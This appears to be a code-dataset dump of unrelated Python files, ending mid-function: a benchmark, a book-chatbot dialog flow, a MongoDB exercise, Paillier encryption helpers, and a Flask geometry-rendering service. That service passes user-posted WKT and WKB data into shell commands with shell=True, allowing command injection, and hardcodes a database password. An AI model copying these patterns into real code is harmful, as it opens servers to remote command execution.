content
stringlengths 5
1.05M
|
|---|
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/gaogaotiantian/progshot/blob/master/NOTICE.txt
import io
from progshot import shoot, dump
class BenchmarkCase:
def __init__(self):
self.s = io.StringIO()
self.big_string = "abc"*1000
self.big_dict = {f"{i}": i for i in range(20)}
def do_baseline(self):
self.many_local_changes()
def do_experiment(self):
with shoot(depth=2):
self.many_local_changes()
def do_dump(self):
films = dump()
return films
def many_local_changes(self):
for _ in range(20):
a = 1
b = 2
c = 3
d = 4
e = 5
f = 6
bm = BenchmarkCase()
do_baseline = bm.do_baseline
do_experiment = bm.do_experiment
do_dump = bm.do_dump
|
"""
```append_question``` is used to change the current flow, like booklink2reply
```append_unused``` is used to add questions that lead to the concrete_book_flow,
e.g. should be responded by a bookname.
"""
import logging
import sentry_sdk
from os import getenv
import random
from common.constants import CAN_CONTINUE_SCENARIO, MUST_CONTINUE, CAN_NOT_CONTINUE
from df_engine.core.keywords import (
PROCESSING,
TRANSITIONS,
GLOBAL,
RESPONSE,
MISC,
)
from df_engine.core import Actor
import df_engine.conditions as cnd
import scenario.sf_conditions as dm_cnd
import common.dff.integration.condition as int_cnd
import common.dff.integration.processing as int_prs
from common.movies import SWITCH_MOVIE_SKILL_PHRASE
from common.science import OFFER_TALK_ABOUT_SCIENCE
import scenario.condition as loc_cnd
import scenario.processing as loc_prs
import scenario.response as loc_rsp
fav_keys = list(loc_rsp.FAVOURITE_BOOK_ATTRS.keys())
fav_keys = iter(fav_keys)
sentry_sdk.init(getenv("SENTRY_DSN"))
logger = logging.getLogger(__name__)
SUPER_CONFIDENCE = 1.0
HIGH_CONFIDENCE = 0.98
DEFAULT_CONFIDENCE = 0.95
BIT_LOWER_CONFIDENCE = 0.90
ZERO_CONFIDENCE = 0.0
flows = {
GLOBAL: {
TRANSITIONS: {
("global_flow", "fallback", 1.5): loc_cnd.exit_skill,
("books_general", "dislikes_reading", 1.5): loc_cnd.dislikes_reading,
("books_general", "book_start", 5): cnd.all(
[
loc_cnd.is_proposed_skill,
cnd.neg(loc_cnd.check_flag("book_skill_active")),
cnd.neg(loc_cnd.check_flag("book_start_visited")),
]
),
("books_general", "book_restart"): cnd.all(
[
loc_cnd.is_proposed_skill,
cnd.neg(loc_cnd.check_flag("book_skill_active")),
loc_cnd.check_flag("book_start_visited"),
]
),
("bot_fav_book", "fav_name", 4): cnd.any( # было 1.8
[
loc_cnd.is_last_used_phrase(loc_rsp.FAVOURITE_BOOK_PHRASES),
loc_cnd.asked_fav_book,
]
),
("bot_fav_book", "fav_denied", 2): cnd.all(
[
loc_cnd.is_last_used_phrase(loc_rsp.FAVOURITE_BOOK_PHRASES),
int_cnd.is_no_vars,
]
),
("bible_flow", "bible_start", 1.8): cnd.all(
[
loc_cnd.asked_about_bible,
cnd.neg(loc_cnd.check_flag("bible_start_visited")),
]
),
("bible_flow", "bible_elaborate", 1.8): cnd.all(
[loc_cnd.asked_about_bible, loc_cnd.check_flag("bible_start_visited")]
),
("genre_flow", "tell_phrase", 1): cnd.all(
[
cnd.any(
[
loc_cnd.told_fav_genre,
loc_cnd.asked_opinion_genre,
]
),
loc_cnd.check_genre_regexp,
]
),
("genre_flow", "return_genrebook", 1.2): loc_cnd.genrebook_request_detected,
("concrete_book_flow", "user_fav", 0.8): cnd.all([loc_cnd.told_fav_book, loc_cnd.book_in_request]),
("concrete_book_flow", "denied_information", 3): cnd.all(
[
cnd.any(
[
loc_cnd.is_last_used_phrase([loc_rsp.TELL_REQUEST, loc_rsp.TELL_REQUEST2]),
loc_cnd.asked_book_content,
]
),
int_cnd.is_no_vars,
]
),
("concrete_book_flow", "tell_about", 1.2): cnd.all(
[
cnd.any(
[
loc_cnd.is_last_used_phrase([loc_rsp.TELL_REQUEST, loc_rsp.TELL_REQUEST2]),
loc_cnd.asked_book_content,
]
),
cnd.any([loc_cnd.about_in_slots, loc_cnd.about_in_request]),
]
),
("concrete_book_flow", "offer_best", 1.6): cnd.all(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
loc_cnd.bestbook_in_request,
]
),
("concrete_book_flow", "offer_date", 1.2): cnd.all(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
loc_cnd.date_in_request,
]
),
("concrete_book_flow", "tell_date", 0.8): cnd.all(
[
cnd.any(
[
loc_cnd.is_last_used_phrase(loc_rsp.WHEN_IT_WAS_PUBLISHED),
loc_cnd.asked_book_date,
]
),
cnd.any([loc_cnd.date_in_slots, loc_cnd.date_in_request]),
]
),
("concrete_book_flow", "offer_genre", 1.2): cnd.all(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
loc_cnd.genre_in_request,
]
),
("concrete_book_flow", "offer_fact", 1.2): cnd.all(
[
cnd.any(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
loc_cnd.about_book,
]
),
cnd.any([loc_cnd.about_in_request, loc_cnd.movie_in_request]),
]
),
("concrete_book_flow", "ask_fav", 0.8): cnd.all(
[
loc_cnd.check_unused(loc_rsp.WHAT_BOOK_IMPRESSED_MOST),
loc_cnd.check_flag("user_fav_book_visited"),
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
]
),
("undetected_flow", "unrecognized_author", 0.8): cnd.all(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
loc_cnd.check_author_regexp,
cnd.neg(loc_cnd.author_in_request),
]
),
("undetected_flow", "no_book_author", 0.8): cnd.all(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
cnd.neg(loc_cnd.bestbook_in_request),
loc_cnd.check_author_regexp,
]
),
("undetected_flow", "cannot_name", 0.7): cnd.all(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
cnd.any([int_cnd.is_no_vars, loc_cnd.doesnt_know]),
cnd.neg(loc_cnd.book_in_request),
cnd.neg(loc_cnd.author_in_request),
cnd.neg(loc_cnd.movie_in_request),
]
),
("undetected_flow", "ask_to_repeat", 0.7): cnd.all(
[
cnd.any(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
loc_cnd.about_book,
]
),
cnd.any([int_cnd.is_yes_vars, loc_cnd.no_entities]),
cnd.neg(loc_cnd.book_in_request),
cnd.neg(loc_cnd.author_in_request),
cnd.neg(loc_cnd.movie_in_request),
]
),
# TRANSITIONS: {},
# TRANSITIONS: {},
# TRANSITIONS: {},
}
},
"global_flow": {
"start": {
RESPONSE: "",
PROCESSING: {"set_can_continue": int_prs.set_can_continue(MUST_CONTINUE)},
TRANSITIONS: {("books_general", "book_start"): cnd.true()},
},
"fallback": {
RESPONSE: loc_rsp.append_unused(
initial="Anyway, let's talk about something else! ",
phrases=[
SWITCH_MOVIE_SKILL_PHRASE,
OFFER_TALK_ABOUT_SCIENCE,
"What's on your mind?",
],
),
PROCESSING: {
"set_flag": loc_prs.set_flag("book_skill_active"),
"set_confidence": int_prs.set_confidence(ZERO_CONFIDENCE),
"set_can_continue": int_prs.set_can_continue(CAN_NOT_CONTINUE),
},
TRANSITIONS: {},
},
},
"books_general": {
"book_start": {
RESPONSE: loc_rsp.append_unused("", [loc_rsp.START_PHRASE]),
PROCESSING: {
"set_confidence": int_prs.set_confidence(SUPER_CONFIDENCE),
"set_flag": loc_prs.set_flag("book_skill_active", True),
"execute_response": loc_prs.execute_response,
},
TRANSITIONS: {
"dislikes_reading": int_cnd.is_no_vars,
# "test1": dm_cnd.is_sf("React.Rejoinder.Support.Track.Clarify"),
"test_1": dm_cnd.is_sf("React.Rejoinder.Support.Track.Clarify"),
"likes_reading": cnd.true(),
},
MISC: {"speech_functions": ["Open.Demand.Fact"]},
},
"book_restart": {
RESPONSE: loc_rsp.append_unused(
initial="Speaking of books, ",
phrases=loc_rsp.QUESTIONS_ABOUT_BOOKS,
exit_on_exhaust=True,
),
PROCESSING: {
"set_confidence": int_prs.set_confidence(DEFAULT_CONFIDENCE),
"set_flag": loc_prs.set_flag("book_skill_active", True),
"set_can_continue": int_prs.set_can_continue(CAN_CONTINUE_SCENARIO),
},
TRANSITIONS: {("undetected_flow", "ask_to_repeat"): cnd.true()},
},
"dislikes_reading": {
RESPONSE: "Why don't you love reading? Maybe you haven't found the right book?",
TRANSITIONS: {"told_why": cnd.true()},
},
"likes_reading": {
RESPONSE: "I enjoy reading so much! Books help me understand humans much better. "
"Why do you enjoy reading?",
TRANSITIONS: {"told_why": cnd.true()},
},
"told_why": {
RESPONSE: loc_rsp.append_unused(
initial="That's great. Outside of a dog, a book is man's best friend. ",
phrases=[loc_rsp.WHAT_BOOK_LAST_READ],
),
TRANSITIONS: {("bot_fav_book", "fav_name"): cnd.true()},
},
"test_1": {
TRANSITIONS: {},
PROCESSING: {
"set_confidence": int_prs.set_confidence(SUPER_CONFIDENCE),
"set_flag": loc_prs.set_flag("book_skill_active", True),
"execute_response": loc_prs.execute_response,
},
RESPONSE: "I think that reading is cool and all people should read books",
MISC: {"speech_functions": ["React.Rejoinder.Support.Response.Resolve"]},
},
},
"bot_fav_book": {
"fav_name": {
RESPONSE: loc_rsp.append_unused(initial="{fav_book_init} ", phrases=[loc_rsp.TELL_REQUEST]),
PROCESSING: {
"save_next_key": loc_prs.save_next_key(fav_keys, loc_rsp.FAVOURITE_BOOK_ATTRS),
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: {
# "fav_denied": cnd.true(3),
"fav_denied": int_cnd.is_no_vars,
},
},
"fav_elaborate": {
RESPONSE: loc_rsp.append_unused(initial="{cur_book_about} ", phrases=[loc_rsp.TELL_REQUEST2]),
PROCESSING: {
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: {
("concrete_book_flow", "offer_date"): cnd.true(),
},
},
"fav_denied": {
RESPONSE: "OK, let me ask you something else then, alright?",
PROCESSING: {
"set_flag": loc_prs.set_flag("denied_favorite", True),
"set_confidence": int_prs.set_confidence(BIT_LOWER_CONFIDENCE),
},
TRANSITIONS: {
("books_general", "book_restart"): int_cnd.is_yes_vars,
},
},
},
"concrete_book_flow": {
"ask_fav": {
RESPONSE: loc_rsp.append_unused(initial="Fabulous! And ", phrases=[loc_rsp.WHAT_BOOK_IMPRESSED_MOST]),
PROCESSING: {
"set_flag": loc_prs.set_flag("user_fav_book_visited", True),
"execute_response": loc_prs.execute_response,
},
TRANSITIONS: {
# ("undetected_flow", "ask_to_repeat"): cnd.any(
# [cnd.neg(loc_cnd.told_fav_book), cnd.neg(loc_cnd.book_in_request)]
# ),
"user_fav": cnd.true()
},
},
"user_fav": {
RESPONSE: "Great choice! Would you like us to discuss it?",
PROCESSING: {
"get_book": loc_prs.get_book,
"set_flag": loc_prs.set_flag("user_fav_book_visited", True),
},
TRANSITIONS: {"denied_information": cnd.true()},
},
"ask_opinion": {
RESPONSE: loc_rsp.append_unused(initial="", phrases=loc_rsp.OPINION_REQUEST_ON_BOOK_PHRASES),
TRANSITIONS: {
"user_liked": loc_cnd.sentiment_detected("positive"),
"user_disliked": loc_cnd.sentiment_detected("negative"),
},
},
"user_liked": {
RESPONSE: loc_rsp.append_question(
initial="I see you love it." "It is so wonderful that you read the books you love. "
),
PROCESSING: {"set_confidence": int_prs.set_confidence(SUPER_CONFIDENCE)},
TRANSITIONS: {
("bible_flow", "bible_start"): cnd.true(),
"denied_information": int_cnd.is_no_vars,
},
},
"user_disliked": {
RESPONSE: loc_rsp.append_question(initial="It's OK. Maybe some other books will fit you better. "),
PROCESSING: {"set_confidence": int_prs.set_confidence(SUPER_CONFIDENCE)},
TRANSITIONS: {},
},
"offer_best": {
RESPONSE: loc_rsp.append_unused(
initial="You have a great taste in books! "
"I also adore books by {cur_book_author}, "
"especially {cur_author_best}. ",
phrases=loc_rsp.ASK_ABOUT_OFFERED_BOOK,
),
PROCESSING: {
"get_book": loc_prs.get_book,
"get_author": loc_prs.get_author,
"get_book_by_author": loc_prs.get_book_by_author,
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: loc_cnd.has_read_transitions,
},
"offer_genre": {
RESPONSE: loc_rsp.ASK_GENRE_OF_BOOK,
PROCESSING: {
"get_book": loc_prs.get_book,
"get_book_genre": loc_prs.get_book_genre,
},
TRANSITIONS: {"tell_genre": cnd.true()},
},
"tell_genre": {
RESPONSE: loc_rsp.append_question(initial="I believe that {cur_book_name} is {cur_genre}. "),
PROCESSING: {
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
# NEW
TRANSITIONS: {
("bible_flow", "bible_start"): cnd.true(),
"denied_information": int_cnd.is_no_vars,
},
},
# new node
# "appreciation": {
# RESPONSE: "You have good taste in books!",
# TRANSITIONS: {
# ()
# },
# },
"offer_fact": {
RESPONSE: ("It's an amazing book! " + loc_rsp.OFFER_FACT_ABOUT_BOOK),
PROCESSING: {
"get_book": loc_prs.get_book,
"about_bookreads": loc_prs.about_bookreads,
"about_wiki": loc_prs.about_wiki,
"get_movie": loc_prs.get_movie,
},
TRANSITIONS: {
("undetected_flow", "change_branch"): cnd.true(),
},
},
"tell_about": { # НЕ РАБОТАЕТ
RESPONSE: loc_rsp.append_unused(initial="{cur_book_about} ", phrases=[loc_rsp.WHEN_IT_WAS_PUBLISHED]),
PROCESSING: {
"get_book_year": loc_prs.get_book_year,
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: {
"tell_date": cnd.all([int_cnd.is_yes_vars, loc_cnd.check_slot("cur_book_ago")]),
"denied_information": int_cnd.is_no_vars,
("global_flow", "fallback"): cnd.true(),
},
},
"tell_movie": {
RESPONSE: "I enjoyed watching the film {cur_book_movie} based on this book, "
"directed by {cur_book_director}. ",
PROCESSING: {
"get_movie": loc_prs.get_movie,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: {},
},
"offer_date": {
RESPONSE: loc_rsp.append_unused(
initial="I've read it. It's an amazing book! ",
phrases=[loc_rsp.WHEN_IT_WAS_PUBLISHED],
),
PROCESSING: {
"get_book": loc_prs.get_book,
"get_book_year": loc_prs.get_book_year,
"execute_response": loc_prs.execute_response,
},
TRANSITIONS: {
"tell_date": cnd.all([int_cnd.is_yes_vars, loc_cnd.check_slot("cur_book_ago")]),
"denied_information": int_cnd.is_no_vars,
("global_flow", "fallback"): cnd.true(),
},
},
"tell_date": {
RESPONSE: loc_rsp.append_unused(initial="{cur_book_ago}ago! ", phrases=loc_rsp.DID_NOT_EXIST),
PROCESSING: {
"get_book_year": loc_prs.get_book_year,
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: {
"offer_genre": loc_cnd.check_slot("cur_book_plain"),
("undetected_flow", "change_branch"): cnd.true(),
},
},
"denied_information": {
RESPONSE: loc_rsp.append_question(initial="As you wish. "),
TRANSITIONS: {("bible_flow", "bible_start"): int_cnd.is_no_vars},
},
},
"genre_flow": {
"tell_phrase": {
RESPONSE: loc_rsp.genre_phrase,
PROCESSING: {
"set_flag": loc_prs.set_flag("user_fav_genre_visited", True),
"get_genre_regexp": loc_prs.get_genre_regexp,
"set_can_continue": int_prs.set_can_continue(MUST_CONTINUE),
},
TRANSITIONS: {
("concrete_book_flow", "denied_information"): int_cnd.is_no_vars,
},
},
"return_genrebook": {
RESPONSE: ("Amazing! I hear, {cur_book_name} is quite good. " + loc_rsp.HAVE_YOU_READ_BOOK),
PROCESSING: {
"get_genre_regexp": loc_prs.get_genre_regexp, # extracts new genre or leaves previous
"get_book_by_genre": loc_prs.get_book_by_genre, # extracts the book
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: loc_cnd.has_read_transitions,
},
"not_read_genrebook": {
RESPONSE: loc_rsp.append_unused(
initial=random.choice(loc_rsp.READ_BOOK_ADVICES) + " ",
phrases=[loc_rsp.TELL_REQUEST],
),
PROCESSING: {"execute_response": loc_prs.execute_response},
TRANSITIONS: {
("books_general", "book_restart"): int_cnd.is_no_vars,
},
},
"genrebook_info": {
RESPONSE: loc_rsp.append_question(initial="{cur_book_about} Anyway, "),
PROCESSING: {
"about_bookreads": loc_prs.about_bookreads,
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: {},
},
"bot_fav": {
RESPONSE: loc_rsp.genre_phrase,
PROCESSING: {
"save_slots_to_ctx": int_prs.save_slots_to_ctx(
{"cur_genre", random.choice(list(loc_rsp.GENRE_PHRASES.keys()))}
)
},
TRANSITIONS: {},
},
},
"bible_flow": {
"bible_start": {
RESPONSE: (
"You have good taste in books! "
"By the way, I know that Bible is one of the most widespread books on Earth. "
"It is the foundation stone of Christianity. Have you read the whole Bible?"
),
TRANSITIONS: {
"bible_elaborate": cnd.true(),
},
},
"bible_elaborate": {
RESPONSE: loc_rsp.append_unused(
initial="Unfortunately, as a socialbot, I don't have an immortal soul, "
"so I don't think I will ever go to Heaven. "
"That's why I don't know much about religion. "
"Apart from the Bible, ",
phrases=loc_rsp.QUESTIONS_ABOUT_BOOKS,
),
TRANSITIONS: {
("undetected_flow", "ask_to_repeat"): cnd.true(),
},
},
},
"undetected_flow": {
"ask_to_repeat": {
RESPONSE: (
"I'm sorry, but I don't know what to say to that yet, "
"but I will definitely learn! Have a nice day, bye!"
),
TRANSITIONS: {},
},
"change_branch": {
RESPONSE: loc_rsp.append_question(initial=""),
TRANSITIONS: {},
},
"cannot_name": {RESPONSE: loc_rsp.BOOK_ANY_PHRASE, TRANSITIONS: {}},
"ask_question": {
RESPONSE: loc_rsp.append_question(initial="Never heard about it. I will check it out later. "),
TRANSITIONS: {},
},
"unrecognized_author": {
RESPONSE: loc_rsp.append_question(
initial="Strange, I've never heard about this author. I'll surely check out his works sometime. "
),
TRANSITIONS: {},
},
"no_book_author": {
RESPONSE: loc_rsp.append_question(initial="{cur_book_author} is a wonderful writer! By the way, "),
PROCESSING: {
"get_author_regexp": loc_prs.get_author_regexp,
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: {},
},
},
}
actor = Actor(
flows,
start_label=("global_flow", "start"),
fallback_label=("global_flow", "fallback"),
)
logger.info("Actor created successfully")
|
from flask import abort, request, render_template, jsonify, send_file
import psycopg2
import sys
import os
import time
import glob
import json
import re
import subprocess
import tempfile
import math
from utils.jsonp import jsonp
from shapely.geometry import shape
from shapely.ops import cascaded_union
from geojson import Feature, FeatureCollection, dumps
from shapely.wkb import loads
def fart_serve(fart_id):
if request.method == 'GET':
try:
tf = open("/tmp/fart_"+fart_id+".png", "r")
return send_file(tf, mimetype='image/png')
except Exception, e:
abort(404)
abort(404)
def fart_recent():
if request.method == 'GET':
try:
search_dir = "/tmp/"
files = filter(os.path.isfile, glob.glob(search_dir + "fart_*.png"))
files.sort(key=lambda x: os.path.getmtime(x))
files = [[os.path.splitext(os.path.basename(tf))[0],time.ctime(os.path.getmtime(tf))] for tf in files]
return render_template("recent.html", files = files[-20:])
#return jsonify({'files':' '.join(f for f in files)})
except Exception, e:
abort(404)
abort(404)
# Yummy default farts
def fart_default():
if request.method == 'POST':
return fart()
# Override the srid
def fart_srid(srid):
if request.method == 'POST':
return fart(srid=srid)
# Override the srid and size
def fart_srid_xy(srid,xsize,ysize):
if request.method == 'POST':
return fart(srid=srid, xsize=xsize, ysize=ysize)
@jsonp
def fart(srid=4326, xsize=800, ysize=800):
# Only POST is accepted
if request.method == 'POST':
data = request.data
# Test code
# return jsonify({'data': data, 'ct': request.environ['HTTP_CONTENT_TYPE']})
# We recieved a GeoJSON payload
if data.startswith('{'):
try:
js = json.loads(data)
return process_geojson(js, srid, xsize, ysize)
except Exception, e:
abort(404)
# WKT Payload
elif re.match(r'^[PLMG\"]',data):
# Strip off "'s if they are there
if data.endswith("\""):
data = data[:-1]
if data.startswith("\""):
data = data[1:]
return process_wkt(data,xsize,ysize)
# WKB Payload
elif re.match(r'^[0-9A-F]+$',data.strip()):
return process_wkb(data,xsize,ysize)
else:
# We dont know what this data is....
# return jsonify({'unknown data': data})
abort(500)
def process_wkb(data,xsize,ysize):
try:
wkbdata = loads(data.strip().decode("hex"))
tf = tempfile.NamedTemporaryFile(prefix='fart_', suffix='.png',delete=False)
cmd = "/usr/local/lib/geom-0.2/bin/geom draw -w %s -h %s -f %s -g '%s'" % (xsize, ysize, tf.name, wkbdata.wkt)
# return jsonify({'cmd':cmd})
proc = subprocess.Popen(
cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
# wait for processing to finish
stdout_value, stderr_value = proc.communicate()
if stderr_value:
# return jsonify({'stdout':stdout_value, 'stderr':sderr_value})
# log.error('stderr_value: %s' % stderr_value)
abort(500)
except Exception, e:
# return jsonify({'stdout':stdout_value, 'stderr':sderr_value})
abort(500)
return "http://mapfart.com/" + os.path.splitext(os.path.basename(tf.name))[0] + "\n"
def process_wkt(data,xsize,ysize):
try:
tf = tempfile.NamedTemporaryFile(prefix='fart_', suffix='.png',delete=False)
cmd = "/usr/local/lib/geom-0.2/bin/geom draw -w %s -h %s -f %s -g '%s'" % (xsize, ysize, tf.name, data)
proc = subprocess.Popen(
cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
# wait for processing to finish
stdout_value, stderr_value = proc.communicate()
if stderr_value:
# return jsonify({'stdout':stdout_value, 'stderr':sderr_value})
# log.error('stderr_value: %s' % stderr_value)
abort(500)
except Exception, e:
# return jsonify({'stdout':stdout_value, 'stderr':sderr_value})
abort(500)
return "http://mapfart.com/" + os.path.splitext(os.path.basename(tf.name))[0] + "\n"
def process_geojson(js, srid, xsize, ysize):
shapes = []
points = []
lines = []
polygons = []
count = 0
for f in js['features']:
count = count + 1
myShape = shape(f['geometry'])
shapes.append(myShape)
if re.match(r'Point', myShape.geom_type) or re.match(r'MultiPoint', myShape.geom_type):
myFeature = Feature(id=count,
geometry=myShape,
properties = {"name": "foo1"})
points.append(myFeature)
elif re.match(r'Line', myShape.geom_type) or re.match(r'MultiLine', myShape.geom_type):
myFeature = Feature(id=count,
geometry=myShape,
properties = {"name": "foo2"})
lines.append(myFeature)
elif re.match(r'Polygon', myShape.geom_type) or re.match(r'MultiPolygon', myShape.geom_type):
myFeature = Feature(id=count,
geometry=myShape,
properties = {"name": "foo3"})
polygons.append(myFeature)
bbox = cascaded_union(shapes).bounds
if srid != 4326:
if srid==3857 or srid==900913:
ymin = bbox[1]
ymax = bbox[3]
# for spherical mercator clamp to 85 deg north and south
if ymin < -85.0:
ymin = -85.0
if ymax > 85.0:
ymax = 85.0
bbox = (bbox[0],ymin,bbox[2],ymax)
# we must translate the bbox to the output projection
connstring="dbname='projfinder' port=5432 user='mapfart' host='localhost' password='mapfart'"
try:
conn=psycopg2.connect(connstring)
cursor=conn.cursor()
sql = "select st_x(st_transform(st_geometryfromtext('POINT(%s %s)',4326),%s)) as xmin, st_y(st_transform(st_geometryfromtext('POINT(%s %s)',4326),%s)) as ymin, st_x(st_transform(st_geometryfromtext('POINT(%s %s)',4326),%s)) as xmax, st_y(st_transform(st_geometryfromtext('POINT(%s %s)',4326),%s)) as ymax" % (bbox[0],bbox[1],str(srid),bbox[0],bbox[1],str(srid),bbox[2],bbox[3],str(srid),bbox[2],bbox[3],str(srid))
cursor.execute(sql)
results = cursor.fetchone()
bbox_string = " ".join(str(b) for b in results)
except Exception, e:
abort(500)
else:
bbox_string = " ".join(str(b) for b in bbox)
# Monkey with the image size to get the aspect ratio about the same as the extent of the data
data_aspect = ((bbox[2] - bbox[0])/2) / (bbox[3] - bbox[1])
if data_aspect>=1:
ysize = math.trunc(float(xsize) / data_aspect)
else:
xsize = math.trunc(float(ysize) * data_aspect)
# Testing debug
#return jsonify({'xsize':xsize, 'ysize':ysize, 'srid':srid})
tf_points = tempfile.NamedTemporaryFile(prefix='fart_pt_', suffix='.json', delete=False)
tf_lines = tempfile.NamedTemporaryFile(prefix='fart_ln_', suffix='.json', delete=False)
tf_polygons = tempfile.NamedTemporaryFile(prefix='fart_poly_', suffix='.json', delete=False)
layers_to_draw = ""
if len(points) > 0:
tf_points.write(dumps(FeatureCollection(points)))
layers_to_draw = layers_to_draw + "points "
if len(lines) > 0:
tf_lines.write(dumps(FeatureCollection(lines)))
layers_to_draw = layers_to_draw + "lines "
if len(polygons) > 0:
tf_polygons.write(dumps(FeatureCollection(polygons)))
layers_to_draw = layers_to_draw + "polygons "
tf_points.flush()
tf_points.close()
tf_lines.flush()
tf_lines.close()
tf_polygons.flush()
tf_polygons.close()
# Now that we have our bounds and up to 3 files (points, lines, polygons) we
# can have mapserver kick out an image.
mapfile = render_template("mapfart.map", point_name = tf_points.name,
line_name = tf_lines.name,
polygon_name = tf_polygons.name,
srid = str(srid))
tf_mapfile = tempfile.NamedTemporaryFile(prefix='fart_', suffix='.map', delete=False)
tf_mapfile.write(mapfile)
tf_mapfile.flush()
tf_mapfile.close()
tf_png = tempfile.NamedTemporaryFile(prefix='fart_', suffix='.png',delete=False)
try:
cmd = "/usr/local/bin/shp2img -m %s -o %s -l '%s' -s %s %s -e %s" % (tf_mapfile.name, tf_png.name, layers_to_draw.strip(), str(xsize), str(ysize), bbox_string)
#return jsonify({'cmd':cmd})
proc = subprocess.Popen(
cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
# wait for processing to finish
stdout_value, stderr_value = proc.communicate()
if stderr_value:
pass
# return jsonify({'stdout':stdout_value, 'stderr':stderr_value})
# log.error('stderr_value: %s' % stderr_value)
except Exception, e:
abort(500)
return "http://mapfart.com/" + os.path.splitext(os.path.basename(tf_png.name))[0] + "\n"
def testcurl():
if request.method == 'POST':
# data = request.form.keys()[0]
data = request.data
foo = ''
if len(request.args) > 0 and request.args['foo']:
foo = request.args['foo']
return jsonify({'data':data, 'foo':foo})
else:
abort(404)
|
# Write a program in the language of your choice
# that will remove the grade of type "homework"
# with the lowest score for each student from the dataset in the handout.
# Since each document is one grade, it should remove one document per student.
# This will use the same data set as the last problem, but if you don't have it,
# you can download and re-import
import pymongo
from pymongo import MongoClient
connection = MongoClient('localhost', 27017)
def find_all_hw_assignments():
db = connection.students
grades = db.grades
try:
for i in range(0,200,1):
homework = grades.find({'type': 'homework', 'student_id': i})
if homework:
array = []
for hw in homework:
array.append(hw)
if array[0]['score'] < array[1]['score']:
grades.delete_one({'_id': array[0]['_id']})
else:
grades.delete_one({'_id': array[1]['_id']})
except Exception as e:
print("Error", e)
find_all_hw_assignments()
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from arch.api.utils import log_utils
from federatedml.secureprotol.encrypt import PaillierEncrypt
from federatedml.secureprotol.fate_paillier import PaillierPublicKey, PaillierPrivateKey
LOGGER = log_utils.getLogger()
def generate_encryption_key_pair():
paillierEncrypt = PaillierEncrypt()
paillierEncrypt.generate_key()
public_key = paillierEncrypt.get_public_key()
private_key = paillierEncrypt.get_privacy_key()
return public_key, private_key
def encrypt_array(public_key: PaillierPublicKey, A):
encrypt_A = []
for i in range(len(A)):
encrypt_A.append(public_key.encrypt(float(A[i])))
return np.array(encrypt_A)
def encrypt_matrix(public_key: PaillierPublicKey, A):
if len(A.shape) == 1:
A = np.expand_dims(A, axis=0)
encrypt_A = []
for i in range(len(A)):
row = []
for j in range(len(A[i])):
if len(A.shape) == 3:
row.append([public_key.encrypt(float(A[i, j, k])) for k in range(len(A[i][j]))])
else:
row.append(public_key.encrypt(float(A[i, j])))
encrypt_A.append(row)
result = np.array(encrypt_A)
if len(A.shape) == 1:
result = np.squeeze(result, axis=0)
return result
def encrypt_matmul(public_key: PaillierPublicKey, A, encrypted_B):
"""
matrix multiplication between a plain matrix and an encrypted matrix
:param public_key:
:param A:
:param encrypted_B:
:return:
"""
if A.shape[-1] != encrypted_B.shape[0]:
LOGGER.debug("A and encrypted_B shape are not consistent")
exit(1)
# TODO: need a efficient way to do this?
res = [[public_key.encrypt(0) for _ in range(encrypted_B.shape[1])] for _ in range(len(A))]
for i in range(len(A)):
for j in range(encrypted_B.shape[1]):
for m in range(len(A[i])):
res[i][j] += A[i][m] * encrypted_B[m][j]
return np.array(res)
def encrypt_matmul_3(public_key: PaillierPublicKey, A, encrypted_B):
if A.shape[0] != encrypted_B.shape[0]:
LOGGER.debug("A and encrypted_B shape are not consistent: " + str(A.shape) + ":" + str(encrypted_B.shape))
exit(1)
res = []
for i in range(len(A)):
res.append(encrypt_matmul(public_key, A[i], encrypted_B[i]))
return np.array(res)
def decrypt(private_key: PaillierPrivateKey, x):
return private_key.decrypt(x)
def decrypt_scalar(private_key: PaillierPrivateKey, x):
return private_key.decrypt(x)
def decrypt_array(private_key: PaillierPrivateKey, X):
